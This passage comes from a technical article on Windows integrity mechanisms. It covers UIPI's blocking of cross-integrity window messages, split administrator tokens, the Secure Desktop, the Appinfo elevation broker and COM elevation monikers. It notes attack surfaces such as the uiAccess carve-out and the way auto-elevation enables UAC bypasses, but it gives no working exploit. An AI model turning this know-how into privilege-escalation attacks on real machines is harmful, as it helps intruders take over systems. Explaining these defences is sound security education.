The windowing-layer analog of MIC. UIPI blocks a defined subset of window messages and hook APIs sent from a lower-IL process to a window owned by a higher-IL process on the same desktop, terminating the cross-IL variant of the shatter-attack class.
&lt;p&gt;If MIC is mandatory integrity for &lt;em&gt;objects&lt;/em&gt;, UIPI is mandatory integrity for &lt;em&gt;windows&lt;/em&gt;. Same idea, different layer of the OS. Same principle: a separate evaluator that runs in the window manager and blocks cross-IL operations regardless of the window&apos;s own configuration [@uipi-wiki].&lt;/p&gt;
&lt;p&gt;The canonical failed-shatter scenario is short and exact. A Medium-IL malware process calls &lt;code&gt;SendMessage(hwnd, WM_SETTEXT, 0, (LPARAM)&quot;some-attacker-controlled-string&quot;)&lt;/code&gt; against a window handle (&lt;code&gt;hwnd&lt;/code&gt;) belonging to a High-IL elevated PowerShell on the same desktop. On Windows XP, which predates UIPI and had no integrity-based elevation, the analogous message would arrive at a higher-privileged process&apos;s window and update its edit control, with no authentication check anywhere in the path. On Vista and every subsequent Windows release, the call returns zero. &lt;code&gt;GetLastError&lt;/code&gt; returns &lt;code&gt;ERROR_ACCESS_DENIED&lt;/code&gt;. The message is silently dropped by &lt;code&gt;win32k.sys&lt;/code&gt; before the receiving process&apos;s window procedure ever sees it. The window manager noticed that the sender&apos;s IL was lower than the receiver&apos;s IL and dropped the message [@uipi-wiki][@russinovich-blog-2007].&lt;/p&gt;
&lt;p&gt;The &quot;silently dropped&quot; part matters operationally. Legacy applications written before Vista did not check the return value of &lt;code&gt;SendMessage&lt;/code&gt;. When Vista shipped UIPI, those applications kept &quot;working&quot; in the sense that they did not crash. They just stopped being effective at any cross-IL interaction they may have previously relied on. This is the same compatibility shape Microsoft used everywhere in Vista: the new bound was real, but the API surface returned plausible failure codes rather than raising new errors that broke legacy callers.&lt;/p&gt;
&lt;h3&gt;What UIPI blocks, precisely&lt;/h3&gt;
&lt;p&gt;UIPI does not block every window message. It blocks a specific dangerous subset, and a complete reading of the article requires reading the list slowly.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Operation&lt;/th&gt;
&lt;th&gt;UIPI behaviour from lower IL to higher IL&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SendMessage&lt;/code&gt; / &lt;code&gt;PostMessage&lt;/code&gt; for &lt;code&gt;WM_SETTEXT&lt;/code&gt;, edit-control mutators, combo-box mutators&lt;/td&gt;
&lt;td&gt;Blocked; returns 0 / &lt;code&gt;ERROR_ACCESS_DENIED&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Posted messages above &lt;code&gt;WM_USER&lt;/code&gt; (0x0400)&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;WM_TIMER&lt;/code&gt; with a callback function pointer&lt;/td&gt;
&lt;td&gt;Blocked (the original Paget vector)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SetWindowsHookEx&lt;/code&gt; against a higher-IL thread or process&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;AttachThreadInput&lt;/code&gt; to a higher-IL thread&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SendInput&lt;/code&gt; targeting a higher-IL window&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Journal record / journal playback hooks&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mouse and most keyboard input from the OS itself&lt;/td&gt;
&lt;td&gt;Allowed (the user is the principal)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Most paint messages (&lt;code&gt;WM_PAINT&lt;/code&gt;, &lt;code&gt;WM_ERASEBKGND&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Allowed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Read-only window queries (&lt;code&gt;GetWindowText&lt;/code&gt;, &lt;code&gt;EnumWindows&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Allowed (return empty / minimal data rather than failing)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&quot;UIPI blocks all &lt;code&gt;WM_*&lt;/code&gt; messages&quot; is one of the most common misconceptions in Windows-security literature. It does not. It blocks the &lt;em&gt;dangerous subset&lt;/em&gt;: the messages and hooks that allow a sender to alter the receiving process&apos;s state or execute code in it [@russinovich-blog-2007][@uipi-wiki].&lt;/p&gt;

sequenceDiagram
    participant M as Medium-IL malware
    participant W as win32k.sys
    participant P as High-IL PowerShell
    M-&amp;gt;&amp;gt;W: SendMessage(hwnd, WM_SETTEXT, ...)
    W-&amp;gt;&amp;gt;W: Compare sender IL (Medium) to target window IL (High)
    Note over W: Sender IL lower than target IL, WM_SETTEXT in dangerous subset
    W--&amp;gt;&amp;gt;M: Returns 0, ERROR_ACCESS_DENIED
    Note over P: Window procedure never invoked, text unchanged
&lt;p&gt;The Microsoft Learn page that opens &quot;Modifies the User Interface Privilege Isolation (UIPI) message filter for a specified window&quot; is the &lt;code&gt;ChangeWindowMessageFilterEx&lt;/code&gt; function reference [@changewindowfilter]. It is the closest thing to a first-party UIPI conceptual page on Microsoft Learn. There is no standalone Microsoft Learn page titled &quot;User Interface Privilege Isolation&quot; at the &lt;code&gt;winmsg&lt;/code&gt; path: the Wikipedia UIPI article is the standard secondary anchor for the concept itself [@uipi-wiki], and Russinovich&apos;s February 2007 TechNet Blogs post introduces UIPI by name in the original architectural canon [@russinovich-blog-2007].&lt;/p&gt;
&lt;h3&gt;The opt-in exemption: &lt;code&gt;ChangeWindowMessageFilterEx&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The UIPI block is per-window and per-message. When a higher-IL window has a legitimate reason to accept a specific message from lower-IL senders (for example, a developer tool that needs to receive &lt;code&gt;WM_COPYDATA&lt;/code&gt; from a Medium-IL client), the higher-IL process can call &lt;code&gt;ChangeWindowMessageFilterEx&lt;/code&gt; to add the specific message to its window&apos;s allow-list [@changewindowfilter].&lt;/p&gt;
&lt;p&gt;The action constants are documented as &lt;code&gt;MSGFLT_ALLOW&lt;/code&gt; (add the message to the allow-list), &lt;code&gt;MSGFLT_RESET&lt;/code&gt; (remove explicit policy and inherit defaults), and &lt;code&gt;MSGFLT_DISALLOW&lt;/code&gt; (explicitly block the message even if defaults would allow it) [@changewindowfilter]. The function returns &lt;code&gt;BOOL&lt;/code&gt;; failure is non-fatal and the caller is expected to validate the result.&lt;/p&gt;
&lt;p&gt;A High-IL window that opts &lt;code&gt;WM_SETTEXT&lt;/code&gt; into the cross-IL allowed list inherits the responsibility to validate the contents of every message it then receives. The filter is the gate. It is not the validator. A higher-IL process that takes attacker-controlled text and pastes it into a system shell has bypassed UIPI in the same way a service that takes attacker-controlled input and passes it to &lt;code&gt;system()&lt;/code&gt; has bypassed least privilege. The mechanism cannot make the higher-IL process safe; it can only make the higher-IL process &lt;em&gt;aware&lt;/em&gt;.&lt;/p&gt;
&lt;h3&gt;The &lt;code&gt;uiAccess=true&lt;/code&gt; carve-out&lt;/h3&gt;
&lt;p&gt;The single largest residual exemption from UIPI is the &lt;code&gt;uiAccess=true&lt;/code&gt; manifest flag, designed to support accessibility software (screen readers, on-screen keyboards, remote-control tools) that needs to interact with windows above its own IL [@uia-security]. A process that asserts &lt;code&gt;uiAccess=true&lt;/code&gt; in its application manifest gets, at process creation, a token flag (&lt;code&gt;TokenUIAccess&lt;/code&gt;) that exempts the process from UIPI&apos;s cross-IL blocks for the &lt;em&gt;outbound&lt;/em&gt; direction. A Medium-IL UI-Access process can post &lt;code&gt;WM_SETTEXT&lt;/code&gt; to a High-IL elevated PowerShell window, because the Medium-IL process is acting on behalf of an accessibility client.&lt;/p&gt;
&lt;p&gt;The gating conditions for &lt;code&gt;uiAccess=true&lt;/code&gt; are tight, by design. Microsoft Learn enumerates three [@uia-security]. The manifest must assert &lt;code&gt;uiAccess=&quot;true&quot;&lt;/code&gt; in the &lt;code&gt;requestedExecutionLevel&lt;/code&gt; element. The binary must carry a valid Authenticode signature. The binary must reside in a directory writable only by administrators, which in practice means &lt;code&gt;%SystemRoot%\System32&lt;/code&gt;, &lt;code&gt;%ProgramFiles%&lt;/code&gt;, or a similarly admin-only path. The three conditions together are intended to bound &lt;code&gt;uiAccess&lt;/code&gt; to vetted, signed, install-time-protected binaries.&lt;/p&gt;
&lt;p&gt;We will return to the &lt;code&gt;uiAccess&lt;/code&gt; carve-out in §9, because Forshaw&apos;s February 2026 Project Zero retrospective documents that five of nine pre-GA Administrator Protection bypasses operated entirely through this surface [@forshaw-adminprot-feb26]. The Vista-era exemption inherited unchanged into 2026 is, nearly twenty years later, the single largest residual cross-IL attack class in the Windows integrity stack.&lt;/p&gt;
&lt;h3&gt;What UIPI killed, precisely&lt;/h3&gt;
&lt;p&gt;UIPI killed the &lt;em&gt;cross-IL&lt;/em&gt; variant of the Paget-2002 shatter-attack class (later extended by Brett Moore&apos;s 2004 work). Same-IL shatter attacks (two Medium-IL processes on the user&apos;s &lt;code&gt;Default&lt;/code&gt; desktop, both belonging to the same user, both running with the user&apos;s authority) are not blocked by UIPI, because UIPI is an IL-based filter. Two same-IL processes can still send each other arbitrary window messages, and this is exactly why every modern browser sandbox layers &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer&lt;/a&gt; and a restricted-token sandbox on top of MIC [@appcontainer-isolation]: the integrity primitives are correct, but they are integrity primitives, not identity primitives, and same-IL same-desktop processes need a different isolation mechanism.&lt;/p&gt;
&lt;p&gt;Together, MIC and UIPI provide an integrity bound on &lt;em&gt;access&lt;/em&gt; (objects) and on &lt;em&gt;user-interface manipulation&lt;/em&gt; (windows). Both are mandatory, default-on, and constant-overhead. They are the load-bearing primitive pair of the entire integrity-level stack. But how does the OS decide which processes get which IL? When you log in as Administrator and open a PowerShell, why is that PowerShell Medium and not High?&lt;/p&gt;
&lt;h2&gt;5. The Split-Token Breakthrough&lt;/h2&gt;
&lt;p&gt;The integrity-level pair (MIC plus UIPI) is the access-control primitive. The split-token model is the &lt;em&gt;policy decision&lt;/em&gt; that wires those primitives into the administrator&apos;s everyday experience. Without the split-token policy, an administrator&apos;s interactive shell would hold a High-IL token at logon and UAC would never need to exist. With it, every administrator on Windows 11 today has &lt;em&gt;two&lt;/em&gt; tokens. One is in use. The other is dormant. The yellow dialog is the negotiation that toggles between them.&lt;/p&gt;

The Vista policy in which an Administrators-group user logging on receives a Medium-IL filtered token plus a dormant High-IL linked token. The filtered token becomes the primary token of the interactive shell; the linked token is used only after consent or auto-elevation, and only when the Application Information service brokers a process creation with it.
&lt;h3&gt;What the LSA does at logon&lt;/h3&gt;
&lt;p&gt;When &lt;code&gt;EnableLUA=1&lt;/code&gt; in &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System&lt;/code&gt; (the default since Vista), and an Administrators-group user logs on, the Local Security Authority subsystem (&lt;code&gt;LSASS&lt;/code&gt;) constructs three things during logon processing [@uac-how-it-works].&lt;/p&gt;
&lt;p&gt;The first is the &lt;em&gt;full token&lt;/em&gt;: an access token that contains all of the user&apos;s administrator group SIDs (enabled, not deny-only), all of the privileges the user is authorised to hold, and an integrity level of High. This is the token that, on XP, would have been the user&apos;s primary token from logon onward.&lt;/p&gt;
&lt;p&gt;The second is the &lt;em&gt;filtered token&lt;/em&gt;: a copy of the full token with all administrator-equivalent group SIDs marked &lt;code&gt;SE_GROUP_USE_FOR_DENY_ONLY&lt;/code&gt;, all privileges except a small user-mode subset removed, and the integrity level reduced to Medium. The administrator group SIDs are not removed; they are marked deny-only so they still match deny ACEs but do not satisfy allow ACEs. The privileges are not zeroed; the powerful ones (&lt;code&gt;SeDebug&lt;/code&gt;, &lt;code&gt;SeTakeOwnership&lt;/code&gt;, &lt;code&gt;SeLoadDriver&lt;/code&gt;, &lt;code&gt;SeAssignPrimaryToken&lt;/code&gt;, and others) are dropped from the filtered token entirely.&lt;/p&gt;
&lt;p&gt;The third is the &lt;em&gt;linked relationship&lt;/em&gt;: the LSA stamps each token with a reference to the other via the &lt;code&gt;TokenLinkedToken&lt;/code&gt; information class, so that a holder of the filtered token can, with the right privileges, retrieve a handle to the dormant full token by calling &lt;code&gt;NtQueryInformationToken(filteredToken, TokenLinkedToken, &amp;amp;linkedToken, ...)&lt;/code&gt; [@uac-how-it-works].&lt;/p&gt;
&lt;p&gt;The filtered token then becomes the primary access token of the user&apos;s interactive shell (&lt;code&gt;explorer.exe&lt;/code&gt;). Every process the user launches by clicking, by &lt;code&gt;Win+R&lt;/code&gt;, by typing in a console, inherits the filtered token as its primary token. The dormant full token sits in the LSA, addressable through &lt;code&gt;TokenLinkedToken&lt;/code&gt;. The verbatim Microsoft Learn statement is exact: &quot;When an administrator logs on, two separate access tokens are created for the user: a standard user access token and an administrator access token&quot; [@uac-how-it-works].&lt;/p&gt;

flowchart TD
    A[&quot;User authenticates&lt;br /&gt;as a member of Administrators&quot;] --&amp;gt; B[&quot;LSA logon processing&lt;br /&gt;(LsaLogonUser)&quot;]
    B --&amp;gt; C[&quot;Full token&lt;br /&gt;(admin SIDs enabled, all privileges, IL = High)&quot;]
    B --&amp;gt; D[&quot;Filtered token&lt;br /&gt;(admin SIDs deny-only, privileges stripped, IL = Medium)&quot;]
    C -.-&amp;gt;|&quot;linked via TokenLinkedToken&quot;| D
    D --&amp;gt; E[&quot;Primary token of explorer.exe&lt;br /&gt;and all interactive child processes&quot;]
    C --&amp;gt; F[&quot;Dormant in LSA, used only by Appinfo after consent or auto-elevation&quot;]
&lt;h3&gt;The TokenElevationType API surface&lt;/h3&gt;
&lt;p&gt;Three values of the &lt;code&gt;TOKEN_ELEVATION_TYPE&lt;/code&gt; enumeration describe what state the current process is in [@token-elevation-type].&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;TokenElevationTypeDefault&lt;/code&gt; (1) -- no split-token policy is in effect for this token. This is the legacy case (&lt;code&gt;EnableLUA=0&lt;/code&gt;) or the case where the user is not a member of any administrators-equivalent group at all. The single token &lt;em&gt;is&lt;/em&gt; the only token, and no linked token exists. On a default consumer or enterprise Windows 11 install with an admin account, this value is rare.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;TokenElevationTypeFull&lt;/code&gt; (2) -- the current process is running with the unfiltered admin token. Admin Approval Mode is in force; this process either was launched via elevation (and holds the linked full token) or was created in a context where the filtered/full distinction is collapsed (some service contexts).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;TokenElevationTypeLimited&lt;/code&gt; (3) -- the current process is running with the filtered token, Admin Approval Mode is in force, and a dormant full token exists. This is the typical state of an interactive admin shell on Windows 11.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;TokenElevationTypeDefault&lt;/code&gt; (value 1) is the legacy or domain-controller case in which &lt;code&gt;EnableLUA=0&lt;/code&gt; and the user has no filtered token at all. On a default consumer Windows install, administrators are always &lt;code&gt;TokenElevationTypeLimited&lt;/code&gt; or &lt;code&gt;TokenElevationTypeFull&lt;/code&gt;, never &lt;code&gt;Default&lt;/code&gt;. The &lt;code&gt;Default&lt;/code&gt; case is what reverting &lt;code&gt;EnableLUA&lt;/code&gt; to 0 produces, and it is the configuration the FAQ in §11 warns against.&lt;/p&gt;
&lt;h3&gt;What the consent prompt actually does&lt;/h3&gt;
&lt;p&gt;The behaviour of the consent prompt now resolves to a single operation, and the operation is not &quot;elevate.&quot; When the user invokes &quot;Run as administrator&quot; on a binary, the shell calls &lt;code&gt;ShellExecuteEx&lt;/code&gt; with the &lt;code&gt;&quot;runas&quot;&lt;/code&gt; verb [@shellexecuteexa]. The Application Information service (the topic of §6.2) receives the request via RPC. Appinfo, running as &lt;code&gt;LocalSystem&lt;/code&gt;, retrieves the linked full token of the calling user via &lt;code&gt;TokenLinkedToken&lt;/code&gt;. Appinfo shows the consent prompt on the Secure Desktop (§6.1). If the user clicks &quot;Yes,&quot; Appinfo creates a new process using the full token as the new process&apos;s primary token, by calling &lt;code&gt;CreateProcessAsUser&lt;/code&gt; with the privileges Appinfo holds because it is &lt;code&gt;LocalSystem&lt;/code&gt; [@russinovich-tnm-2007].&lt;/p&gt;
&lt;p&gt;The bits that move are the kernel-level handle for the new process and the assignment of the linked token as that process&apos;s primary token. The bits the prompt itself moves are zero. The prompt is the consent surface; the token swap is the primitive.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The consent prompt does not create authority. It uses authority that was already constructed at logon and held dormant in the linked token. The same primitive can move bits without the prompt -- that is exactly what auto-elevation does.&lt;/p&gt;
&lt;/blockquote&gt;

sequenceDiagram
    participant U as User
    participant E as explorer.exe (Medium IL)
    participant A as Appinfo (LocalSystem)
    participant C as consent.exe (Secure Desktop)
    participant P as New process (High IL)
    U-&amp;gt;&amp;gt;E: Right-click, Run as administrator
    E-&amp;gt;&amp;gt;A: RPC: request elevation of target.exe
    A-&amp;gt;&amp;gt;A: Look up TokenLinkedToken of caller&apos;s filtered token
    A-&amp;gt;&amp;gt;C: Show consent prompt
    U-&amp;gt;&amp;gt;C: Click Yes
    C--&amp;gt;&amp;gt;A: Consent granted
    A-&amp;gt;&amp;gt;P: CreateProcessAsUser(linked full token, target.exe)
    Note over P: New process runs at High IL, full admin SIDs enabled, full privileges

Split-token administrator in UAC just means MS get to annoy you with prompts unnecessarily but serves very little, if not zero security benefit. -- James Forshaw, *Reading Your Way Around UAC (Part 1)*, Tyranid&apos;s Lair, May 2017
&lt;p&gt;Forshaw&apos;s 2017 critique is the load-bearing observation that frames the rest of the article [@forshaw-reading-uac]. Even with the elegant split-token policy in place, there is a structural problem the design did not solve. The filtered token and the linked token share the &lt;em&gt;same user SID&lt;/em&gt;. They write to the &lt;em&gt;same &lt;code&gt;%USERPROFILE%&lt;/code&gt;&lt;/em&gt;. They consult the &lt;em&gt;same &lt;code&gt;HKCU&lt;/code&gt; registry hive&lt;/em&gt;. They live in the &lt;em&gt;same logon-session LUID&lt;/em&gt;. From an integrity-isolation point of view, the two tokens are bounded against each other; from an identity-isolation point of view, they are the same user.&lt;/p&gt;
&lt;p&gt;That shared-identity property is what made the bypass-research industry possible, and what Administrator Protection finally attacks in 2024 (§9). We will return to it. First, let us tour the rest of the stack the consent prompt sits on. If Appinfo is the SYSTEM-trusted broker that does the token swap, where does it live? And what stops malware from spoofing the consent prompt itself?&lt;/p&gt;
&lt;h2&gt;6. The Full UAC Stack on a Modern Windows Box&lt;/h2&gt;
&lt;p&gt;The reader now knows the four load-bearing primitives. This section walks every supporting piece that surrounds them on a 2026 Windows install, in the order needed to follow an elevation event end-to-end. There are four pieces: the Secure Desktop the prompt renders on, the Appinfo service that brokers the token swap, the two distinct activation surfaces that trigger an elevation, and the auto-elevation allowlist that shaped fifteen years of bypass research.&lt;/p&gt;
&lt;h3&gt;6.1 The Secure Desktop, not Session 0&lt;/h3&gt;

A separate desktop object at the Object-Manager path `\Sessions\\Windows\WindowStations\WinSta0\Winlogon`, within the user&apos;s interactive session, on which `consent.exe` runs the UAC prompt. Isolated from the user&apos;s `Default` desktop by Object-Manager DACL and the `SwitchDesktop` API.
&lt;p&gt;When you click &quot;Run as administrator&quot; and the screen dims and the prompt appears, the screen dims because you have just been switched to a different &lt;em&gt;desktop&lt;/em&gt;. Not a different session, not Session 0, not a different window station. A different desktop within the same window station, accessed through the &lt;code&gt;SwitchDesktop&lt;/code&gt; API [@russinovich-tnm-2007].&lt;/p&gt;
&lt;p&gt;The Object-Manager path is exact. Inside the user&apos;s interactive session (Session 1 if the user is the first interactive logon, higher numbers for subsequent users), there is a window station named &lt;code&gt;WinSta0&lt;/code&gt;. Inside &lt;code&gt;WinSta0&lt;/code&gt; there are several desktop objects: &lt;code&gt;Default&lt;/code&gt; (where the user&apos;s normal interactive processes paint), &lt;code&gt;Winlogon&lt;/code&gt; (where &lt;code&gt;consent.exe&lt;/code&gt; runs the prompt), and &lt;code&gt;Disconnect&lt;/code&gt; and &lt;code&gt;Screen-saver&lt;/code&gt; for related uses. The full path of the Secure Desktop is &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\Windows\WindowStations\WinSta0\Winlogon&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;Winlogon&lt;/code&gt; desktop is protected by an Object-Manager DACL that the user&apos;s normal interactive processes (running on &lt;code&gt;Default&lt;/code&gt;) cannot open for &lt;code&gt;DESKTOP_CREATEWINDOW&lt;/code&gt; or &lt;code&gt;DESKTOP_HOOKCONTROL&lt;/code&gt;. A Medium-IL malware process on &lt;code&gt;Default&lt;/code&gt; cannot draw into the &lt;code&gt;Winlogon&lt;/code&gt; desktop, cannot enumerate its windows, and cannot send messages to them. The OS performs the desktop switch in &lt;code&gt;win32k.sys&lt;/code&gt; and renders &lt;code&gt;consent.exe&lt;/code&gt;&apos;s window on the new desktop with a snapshot of the previous desktop as a dimmed background, so the user has visual continuity but &lt;code&gt;consent.exe&lt;/code&gt; is the only process accepting input [@russinovich-tnm-2007].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Secure Desktop is &lt;em&gt;not&lt;/em&gt; in Session 0. Session 0 Isolation is a different Vista feature that moved all Windows services off the interactive desktop into a non-interactive session (Session 0), separately from the per-user interactive sessions (Sessions 1, 2, ...). The Secure Desktop is &lt;em&gt;within&lt;/em&gt; the user&apos;s interactive session: a different desktop object inside the same window station, not a different session. The two features ship together in Vista and are constantly confused, because they are both 2006-era hardening primitives. They are architecturally independent: Session 0 Isolation prevents services from drawing on the user&apos;s desktop, and the Secure Desktop prevents the user&apos;s processes from drawing on the prompt&apos;s desktop. Conflating them mis-describes how either one works. The corpus&apos;s &lt;a href=&quot;https://paragmali.com/blog/the-object-manager-namespace/&quot; rel=&quot;noopener&quot;&gt;Object Manager Namespace&lt;/a&gt; article (#46) covers Session 0 Isolation directly; this article treats only the Secure Desktop.&lt;/p&gt;
&lt;/blockquote&gt;

A separate Vista feature, architecturally independent of the Secure Desktop, that moved all Windows services off the interactive desktop and into Session 0. The two features ship together in Vista and are constantly confused, but they live at different layers of the Object Manager hierarchy.

flowchart TD
    A[&quot;Session 1&lt;br /&gt;(interactive logon for user &apos;admin&apos;)&quot;] --&amp;gt; B[&quot;WinSta0&lt;br /&gt;interactive window station&quot;]
    A --&amp;gt; C[&quot;Service-0x0-3e7$&lt;br /&gt;non-interactive WinSta (services)&quot;]
    B --&amp;gt; D[&quot;Default desktop&lt;br /&gt;explorer.exe, browsers, console windows&lt;br /&gt;(Medium IL processes)&quot;]
    B --&amp;gt; E[&quot;Winlogon desktop&lt;br /&gt;consent.exe renders here&lt;br /&gt;(Secure Desktop)&quot;]
    B --&amp;gt; F[&quot;Disconnect / Screen-saver&lt;br /&gt;desktops&quot;]
    D -. &quot;blocked by Object-Manager DACL&lt;br /&gt;and SwitchDesktop&quot; .-&amp;gt; E
&lt;p&gt;The Secure Desktop addresses UI spoofing and input injection against the prompt itself. It does not address whether elevation can happen &lt;em&gt;without&lt;/em&gt; a Secure Desktop prompt; that is the territory of the auto-elevation allowlist (§6.4) and of the bypass-research class (§7).&lt;/p&gt;
&lt;h3&gt;6.2 The Application Information service (Appinfo)&lt;/h3&gt;

The SYSTEM-trusted Windows service (`appinfo.dll`, hosted in `svchost.exe`, runs under `LocalSystem`) that mediates the token swap between filtered and linked tokens at elevation time. Required service: &quot;Run as administrator&quot; fails without it. The modern process-creation entry point is `RAiLaunchAdminProcess`.
&lt;p&gt;Every UAC elevation on Windows goes through one service: Appinfo (display name &quot;Application Information&quot;). Its image is &lt;code&gt;C:\Windows\System32\appinfo.dll&lt;/code&gt;, loaded into a shared &lt;code&gt;svchost.exe&lt;/code&gt; host process, running as &lt;code&gt;LocalSystem&lt;/code&gt; [@russinovich-tnm-2007].&lt;/p&gt;
&lt;p&gt;The job is single-purpose: be the SYSTEM-trusted broker that performs the token swap. A Medium-IL caller cannot, by definition, create a process holding a token the caller does not possess. Creating a process under a token with privileges the caller lacks requires two privileges Medium-IL filtered admin tokens do not hold: &lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt; and &lt;code&gt;SeIncreaseQuotaPrivilege&lt;/code&gt;. &lt;code&gt;LocalSystem&lt;/code&gt; has both [@russinovich-tnm-2007]. The broker therefore has to run as &lt;code&gt;LocalSystem&lt;/code&gt;, and that is what Appinfo is for.&lt;/p&gt;
&lt;p&gt;The modern entry point on &lt;a href=&quot;https://paragmali.com/blog/every-uac-prompt-is-an-alpc-handshake-a-field-guide-to-windo/&quot; rel=&quot;noopener&quot;&gt;Appinfo&apos;s RPC interface&lt;/a&gt; is &lt;code&gt;RAiLaunchAdminProcess&lt;/code&gt;, documented verbatim in Forshaw&apos;s February 2026 Project Zero post on Administrator Protection [@forshaw-adminprot-feb26]. The Medium-IL caller invokes &lt;code&gt;ShellExecuteEx&lt;/code&gt; with &lt;code&gt;&quot;runas&quot;&lt;/code&gt;; the shell marshalls the request across to Appinfo; Appinfo retrieves the caller&apos;s &lt;code&gt;TokenLinkedToken&lt;/code&gt;; if a prompt is needed, Appinfo shows &lt;code&gt;consent.exe&lt;/code&gt; on the Secure Desktop; if the user clicks &quot;Yes,&quot; Appinfo calls &lt;code&gt;RAiLaunchAdminProcess&lt;/code&gt; to create the new process under the linked full token.&lt;/p&gt;
&lt;p&gt;Disable Appinfo and &quot;Run as administrator&quot; returns an error. It is the single point of trust in the elevation pipeline, which is exactly why the bypass-research industry pays attention to it: anything that can trick Appinfo into auto-elevating an attacker-influenced binary, without the consent prompt, becomes a fileless UAC bypass (§7.1).&lt;/p&gt;
&lt;h3&gt;6.3 Two activation surfaces&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; When you say &quot;elevate a thing,&quot; the operating system understands &lt;em&gt;two&lt;/em&gt; distinct primitives, not one. &lt;code&gt;ShellExecuteEx &quot;runas&quot;&lt;/code&gt; is whole-process elevation: the OS launches a new process and runs the entire process at High IL. The COM Elevation Moniker is per-object elevation: the OS spins up an isolated &lt;code&gt;dllhost.exe&lt;/code&gt; that exposes exactly one COM CLSID&apos;s methods at High IL while the caller stays at Medium. The bypass-research literature attacks these two surfaces in very different ways. Conflating them mis-describes both the attack surface and the fix surface.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The first activation surface is &lt;code&gt;ShellExecuteEx&lt;/code&gt; with the &lt;code&gt;&quot;runas&quot;&lt;/code&gt; verb. The OS launches &lt;code&gt;consent.exe&lt;/code&gt;, asks the user, and if approved, Appinfo creates a brand-new process under the caller&apos;s linked full token. The new process is High-IL for its entire lifetime, with the entire administrator privilege set and all the admin group SIDs enabled. The Windows Explorer &quot;Run as administrator&quot; context menu uses this verb. So does the &lt;code&gt;runas /trustlevel:&lt;/code&gt; command. So does any program that calls &lt;code&gt;ShellExecuteEx&lt;/code&gt; and sets the &lt;code&gt;lpVerb&lt;/code&gt; member of &lt;code&gt;SHELLEXECUTEINFO&lt;/code&gt; to the string &lt;code&gt;&quot;runas&quot;&lt;/code&gt; [@shellexecuteexa].&lt;/p&gt;

A COM activation surface (`Elevation:Administrator!new:{CLSID}`) that asks the OS to instantiate a single COM out-of-process server in a new elevated `dllhost.exe`, exposing only that one CLSID&apos;s methods at High IL. Per-object elevation, distinct from `ShellExecuteEx &quot;runas&quot;` whole-process elevation.
&lt;p&gt;The second activation surface is the COM Elevation Moniker. A Medium-IL caller invokes &lt;code&gt;CoGetObject&lt;/code&gt; (or &lt;code&gt;CoCreateInstance&lt;/code&gt; via a moniker) with the display name &lt;code&gt;&quot;Elevation:Administrator!new:{CLSID}&quot;&lt;/code&gt; (or &lt;code&gt;&quot;Elevation:Highest!new:{CLSID}&quot;&lt;/code&gt;). This asks the OS to instantiate a &lt;em&gt;single COM out-of-process server&lt;/em&gt; in a new elevated &lt;code&gt;dllhost.exe&lt;/code&gt; host process, exposing only that one CLSID&apos;s methods at High IL. The caller stays at Medium. Only the COM object&apos;s host process is elevated, and only for the lifetime of the object [@com-elevation-moniker].&lt;/p&gt;
&lt;p&gt;The semantics are deliberately narrow. The COM Elevation Moniker requires the target CLSID to opt in via two registry values under &lt;code&gt;HKCR\CLSID\{CLSID}&lt;/code&gt;: &lt;code&gt;Elevation\Enabled = 1&lt;/code&gt; and an &lt;code&gt;LocalizedString&lt;/code&gt; value that names the elevation prompt&apos;s display string. Not every COM class is moniker-eligible; the registry enables elevation per CLSID.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;&lt;code&gt;ShellExecuteEx &quot;runas&quot;&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;COM Elevation Moniker&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Granularity&lt;/td&gt;
&lt;td&gt;Whole process&lt;/td&gt;
&lt;td&gt;One COM object&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
